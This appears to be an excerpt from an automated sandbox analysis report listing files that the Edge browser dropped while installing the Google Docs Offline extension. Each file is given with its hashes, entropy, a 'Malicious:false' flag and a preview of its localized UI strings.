                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\sv\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):884
                                                                                        Entropy (8bit):4.627108704340797
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\sw\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):980
                                                                                        Entropy (8bit):4.50673686618174
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ta\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1941
                                                                                        Entropy (8bit):4.132139619026436
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\te\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1969
                                                                                        Entropy (8bit):4.327258153043599
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\th\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1674
                                                                                        Entropy (8bit):4.343724179386811
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\tr\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1063
                                                                                        Entropy (8bit):4.853399816115876
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\uk\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1333
                                                                                        Entropy (8bit):4.686760246306605
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ur\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1263
                                                                                        Entropy (8bit):4.861856182762435
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\vi\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1074
                                                                                        Entropy (8bit):5.062722522759407
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):879
                                                                                        Entropy (8bit):5.7905809868505544
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1205
                                                                                        Entropy (8bit):4.50367724745418
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):843
                                                                                        Entropy (8bit):5.76581227215314
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\zu\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):912
                                                                                        Entropy (8bit):4.65963951143349
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_metadata\verified_contents.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):11280
                                                                                        Entropy (8bit):5.754230909218899
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsN9Jtwg1MK8HNnswuHEIIMuuqd7CKqv+pccW5SJ+:m8IGIEu8RfW+
                                                                                        MD5:BE5DB35513DDEF454CE3502B6418B9B4
                                                                                        SHA1:C82B23A82F745705AA6BCBBEFEB6CE3DBCC71CB1
                                                                                        SHA-256:C6F623BE1112C2FDE6BE8941848A82B2292FCD2B475FBD363CC2FD4DF25049B5
                                                                                        SHA-512:38C48E67631FAF0594D44525423C6EDC08F5A65F04288F0569B7CF8C71C359924069212462B0A2BFA38356F93708143EE1CBD42295D7317E8670D0A0CD10BAFD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\dasherSettingSchema.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):854
                                                                                        Entropy (8bit):4.284628987131403
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\manifest.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2525
                                                                                        Entropy (8bit):5.417689528134667
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1e9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APegiVb
                                                                                        MD5:10FF8E5B674311683D27CE1879384954
                                                                                        SHA1:9C269C14E067BB86642EB9F4816D75CF1B9B9158
                                                                                        SHA-256:17363162A321625358255EE939F447E9363FF2284BD35AE15470FD5318132CA9
                                                                                        SHA-512:4D3EB89D398A595FEA8B59AC6269A57CC96C4A0E5A5DB8C5FE70AB762E8144A5DF9AFC8756CA2E798E50778CD817CC9B0826FC2942DE31397E858DBFA1B06830
                                                                                        Malicious:false
                                                                                        Reputation:unknown
